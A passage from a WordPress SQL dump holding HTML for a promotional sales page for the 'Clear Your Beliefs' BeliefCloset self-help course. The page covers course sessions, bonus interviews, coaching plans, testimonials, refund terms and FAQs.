class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:21:11', '2014-06-17 19:21:11', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(927, 4194, '2014-06-17 14:21:53', '2014-06-17 19:21:53', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n</div>\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: 